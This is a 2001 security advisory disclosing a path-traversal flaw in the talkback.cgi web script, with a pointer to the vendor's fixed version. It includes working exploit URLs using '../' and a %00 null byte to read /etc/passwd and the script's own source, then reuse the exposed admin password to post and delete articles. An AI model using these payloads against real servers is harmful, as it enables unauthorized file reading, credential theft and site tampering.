Talkback.cgi allows remote users to view any file on the webserver. Exploit URL included. It is also possible to display the admin password. Fix available here.
[whizkunde security advisory: talkback (CGI)]
https://www.whizkunde.org | stan@whizkunde.org
----------------------------------------------------------
Release date: April 9th 2001
Subject: talkback.cgi security problem
Systems affected: UNIX systems running talkback CGI script
Vendor: https://www.waytotheweb.com
----------------------------------------------------------
1. problem
Talkback.cgi may allow remote users (website visitors) to
view any file on a webserver (depending on the user the
webserver is running as).
Consider this URL:
https://www.VULNERABLE-HOST.com/cgi-bin/talkback.cgi?article=
../../../../../../../../etc/passwd%00&action=view&matchview=1
This will display /etc/passwd (if the webserver user has
access to this file).
Another URL can display the source of talkback.cgi itself
that contains the admin password:
https://www.VULNERABLE-HOST.com/cgi-bin/talkback.cgi?article=
../cgi-bin/talkback.cgi%00&action=view&matchview=1
(You might have to use a different path instead of
../cgi-bin/talkback.cgi%00; this depends on where the
cgi-bin is installed.)
In this file you can find $admin_password that can be used in:
https://www.VULNERABLE-HOST.com/cgi-bin/talkback.cgi?action=admin
to post & delete articles.
2. fix
Way To The Web has released an updated version of
talkback.cgi that isn't vulnerable to this problem:
https://www.waytotheweb.com/webscripts/talkback.htm
----------------------------------------------------------
Stan a.k.a. ThePike
stan@whizkunde.org
https://www.whizkunde.org
Copyright whizkunde security team 2001